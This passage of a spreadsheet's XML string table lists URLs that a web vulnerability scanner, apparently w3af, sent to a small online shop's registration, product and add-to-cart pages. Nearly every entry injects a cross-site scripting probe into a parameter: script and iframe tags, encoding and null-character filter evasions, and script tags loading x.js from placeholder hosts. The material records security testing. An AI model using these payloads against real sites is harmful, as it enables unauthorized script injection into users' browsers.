    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=dns9q&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;fake_alert(string.fromcharcode(ualo))&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login='';!--"&lt;ualo&gt;=&amp;{()}&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;_x0000_script&gt;fake_alert("ualo")&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;fake_alert("ualo")&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script+src=http://ualo/x.js&gt;&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;a=/ualo/fake_alert(a.source)&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=se8rt&lt;rbfa&gt;rbfa"rbfa'rbfa(rbfa)se8rt</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;alert("3fxr")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id='';!--"&lt;3fxr&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/xss+src=http://3fxr/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/src=http://3fxr/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;scr_x0000_ipt&gt;alert("3fxr")&lt;/sc_x0000_ript&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;iframe+src="javascript:alert('3fxr');"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;alert(string.fromcharcode(3fxr))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=javas&amp;#x09;cript:alert("3fxr");</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script+src=http://3fxr/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;a=/folm/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;fake_alert(string.fromcharcode(folm))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;fake_alert("folm")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;_x0000_script&gt;fake_alert("folm")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/src=http://folm/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script&gt;a=/vyf8/fake_alert(a.source)&lt;/script&gt;&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script&gt;fake_alert(string.fromcharcode(vyf8))&lt;/script&gt;&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre='';!--"&lt;vyf8&gt;=&amp;{()}&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;_x0000_script&gt;fake_alert("vyf8")&lt;/script&gt;&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script/xss+src=http://vyf8/x.js&gt;&lt;/script&gt;&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script+src=http://vyf8/x.js&gt;&lt;/script&gt;&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=jqaox&lt;v7mi&gt;v7mi"v7mi'v7mi(v7mi)jqaox&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;_x0000_script&gt;alert("6d7y")&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;iframe+src="javascript:alert('6d7y');"&gt;&lt;/iframe&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;script/src=http://6d7y/x.js&gt;&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;scr_x0000_ipt&gt;alert("6d7y")&lt;/sc_x0000_ript&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio='';!--"&lt;kj52&gt;=&amp;{()}&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;script/xss+src=http://kj52/x.js&gt;&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;_x0000_script&gt;fake_alert("kj52")&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;script/src=http://kj52/x.js&gt;&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;script&gt;fake_alert(string.fromcharcode(kj52))&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;script&gt;a=/kj52/fake_alert(a.source)&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;script+src=http://kj52/x.js&gt;&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;script&gt;fake_alert("kj52")&lt;/script&gt;&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=bwew7&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=zruk3&lt;waiq&gt;waiq"waiq'waiq(waiq)zruk3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script&gt;alert(string.fromcharcode(rqxd))&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script/xss+src=http://rqxd/x.js&gt;&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;_x0000_script&gt;alert("rqxd")&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script&gt;a=/rqxd/alert(a.source)&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=javascript:alert("rqxd");&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;scr_x0000_ipt&gt;alert("rqxd")&lt;/sc_x0000_ript&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script&gt;a=/yauw/fake_alert(a.source)&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script&gt;fake_alert(string.fromcharcode(yauw))&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id='';!--"&lt;yauw&gt;=&amp;{()}&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script+src=http://yauw/x.js&gt;&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script/src=http://yauw/x.js&gt;&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script&gt;fake_alert("yauw")&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;script/xss+src=http://yauw/x.js&gt;&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=pqjiq</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=s0rbf&lt;1jfs&gt;1jfs"1jfs'1jfs(1jfs)s0rbf</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script&gt;a=/ogsh/alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script&gt;alert(string.fromcharcode(ogsh))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script+src=http://ogsh/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script&gt;alert("ogsh")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad='';!--"&lt;ogsh&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script&gt;a=/uplb/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script+src=http://uplb/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script/xss+src=http://uplb/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;script&gt;fake_alert("uplb")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad='';!--"&lt;uplb&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=hz66z&lt;rqbz&gt;rqbz"rqbz'rqbz(rqbz)hz66z</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;alert("uyyc")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id='';!--"&lt;uyyc&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/src=http://uyyc/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;scr_x0000_ipt&gt;alert("uyyc")&lt;/sc_x0000_ript&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=javas	cript:alert("uyyc");</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;iframe+src="javascript:alert('uyyc');"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/xss+src=http://uyyc/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=javas_x0000_cript:alert("uyyc");</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;alert(string.fromcharcode(uyyc))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;a=/uyyc/alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script+src=http://uyyc/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;a=/dsnm/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;fake_alert("dsnm")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;_x0000_script&gt;fake_alert("dsnm")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/xss+src=http://dsnm/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;fake_alert(string.fromcharcode(dsnm))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id='';!--"&lt;dsnm&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script+src=http://mvee/x.js&gt;&lt;/script&gt;&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre='';!--"&lt;mvee&gt;=&amp;{()}&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script&gt;fake_alert("mvee")&lt;/script&gt;&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script&gt;a=/mvee/fake_alert(a.source)&lt;/script&gt;&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script&gt;fake_alert(string.fromcharcode(mvee))&lt;/script&gt;&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;_x0000_script&gt;fake_alert("mvee")&lt;/script&gt;&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=uvvm7&lt;gwi5&gt;gwi5"gwi5'gwi5(gwi5)uvvm7&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;script+src=http://faqc/x.js&gt;&lt;/script&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;_x0000_script&gt;alert("faqc")&lt;/script&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;script/src=http://faqc/x.js&gt;&lt;/script&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;iframe+src="javascript:alert('faqc');"&gt;&lt;/iframe&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;scr_x0000_ipt&gt;alert("faqc")&lt;/sc_x0000_ript&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=javas&amp;#x09;cript:alert("faqc");&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;script&gt;a=/ienq/fake_alert(a.source)&lt;/script&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;script&gt;fake_alert("ienq")&lt;/script&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;script&gt;fake_alert(string.fromcharcode(ienq))&lt;/script&gt;&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=1rxvg&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=jjenu&lt;3qga&gt;3qga"3qga'3qga(3qga)jjenu&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;script&gt;alert(string.fromcharcode(a78b))&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;script&gt;alert("a78b")&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;script+src=http://a78b/x.js&gt;&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id='';!--"&lt;a78b&gt;=&amp;{()}&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;script&gt;a=/a78b/alert(a.source)&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;script/src=http://a78b/x.js&gt;&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;iframe+src="javascript:alert('a78b');"&gt;&lt;/iframe&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;scr_x0000_ipt&gt;alert("a78b")&lt;/sc_x0000_ript&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;_x0000_script&gt;alert("a78b")&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;script&gt;fake_alert(string.fromcharcode(l40q))&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;script&gt;a=/l40q/fake_alert(a.source)&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id='';!--"&lt;l40q&gt;=&amp;{()}&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=4vqld</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=obkns&lt;zk5l&gt;zk5l"zk5l'zk5l(zk5l)obkns</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=javas_x0000_cript:alert("cgfs");</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;script+src=http://cgfs/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad='';!--"&lt;cgfs&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;_x0000_script&gt;alert("cgfs")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=javas	cript:alert("cgfs");</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=javascript:alert("cgfs");</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;scr_x0000_ipt&gt;alert("cgfs")&lt;/sc_x0000_ript&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;script/xss+src=http://cgfs/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=javas&amp;#x09;cript:alert("cgfs");</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;iframe+src="javascript:alert('cgfs');"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;script&gt;alert(string.fromcharcode(cgfs))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;script&gt;alert("cgfs")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;script&gt;fake_alert(string.fromcharcode(8tay))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;script/xss+src=http://8tay/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;_x0000_script&gt;fake_alert("8tay")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad='';!--"&lt;8tay&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;script/src=http://8tay/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=0jjqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=pzti3&lt;ahtm&gt;ahtm"ahtm'ahtm(ahtm)pzti3</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;a=/thbu/alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id='';!--"&lt;thbu&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/src=http://thbu/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/xss+src=http://thbu/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=javas	cript:alert("thbu");</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=javascript:alert("thbu");</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;_x0000_script&gt;alert("thbu")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;alert(string.fromcharcode(thbu))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;iframe+src="javascript:alert('thbu');"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=javas_x0000_cript:alert("thbu");</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;alert("thbu")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=javas&amp;#x09;cript:alert("thbu");</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;scr_x0000_ipt&gt;alert("thbu")&lt;/sc_x0000_ript&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;fake_alert("jnz1")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id='';!--"&lt;jnz1&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script+src=http://jnz1/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script/src=http://jnz1/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
